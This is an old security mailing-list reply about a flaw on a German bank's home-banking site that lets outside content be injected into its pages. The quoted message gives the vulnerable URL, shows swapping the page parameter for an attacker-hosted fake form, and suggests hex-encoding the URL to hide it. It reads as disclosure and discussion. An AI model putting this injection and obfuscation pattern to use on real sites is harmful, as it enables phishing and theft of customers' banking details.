Re: security issue at hypovereins bank

From: Dominik Birk (dominik@code-foundation.de)
Date: Thu Apr 04 2002 - 14:51:05 PST

    At 12:12 05.04.02 +0200, hnz geeratz[room23] wrote:
    >hello

    good evening hnz

    >I found this security issue on the german hypovereins bank.

    I'm from Germany and there was a gap like this in the hypovereinsbank site
    a few months ago.

    >They are informed vor 3 months ago , still there is nothing changed.
    >The security hole will allow a atacker to include his own forms in the
    >website. This will give him an option to collect sensible information.
    >It  is a home bankin system!

    I think you can call this security hole CSS (cross-site-scripting). At this
    moment I would like to appeal to the paper of Obscure.

    http://eyeonsecurity.net/papers/Extended%20HTML%20Form%20Attack.htm

    The german version is under
    http://www.code-foundation.de/archiv/form_attack.htm

    >take a look at this (long) URL:
    >http://www.hypovereinsbank.de/pub/templates/index.jsp?pageurl=%2Fpub%2Fio%2Fkarr%2F28100.jsp&id=18&mcontext=menu
    >
    >now it is possible to change the
    >pageurl=%2Fpub%2Fio%2Fkarr%2F28100.jsp&id=18&mcontext=menu
    >part to something like pageurl=http://www.evol.org/fake_form.php
    >
    >ore try :
    >http://www.hypovereinsbank.de/pub/templates/index.jsp?pageurl=http://www.google.de
    >
    >so it is possible to include everything in this webpage.
    >The attacker could obscure the url in a form like:
    >pageurl=h%74t%70%3A%2Fw%77w%77............
    >so the user will not notice that the include form is not from the original
    >server

    Yes, you are right. This is a really bad security hole an in my opinion it
    is negligent to let shit hole open. The Hypovereinsbank is a great bank in
    Germany.

    >It opens a port to a new form of social hacking and data grabbing.

    ACK. I'm very astonished about the negligence of several System Admins.

    >greetings hnz g

    Sincerely

    Dominik Birk

    --
    http://www.code-foundation.de
    217.229.69.207 - - [14/Oct/2001:02:29:41 +0200] "GET

    Microsoft? Where do you want to surf today?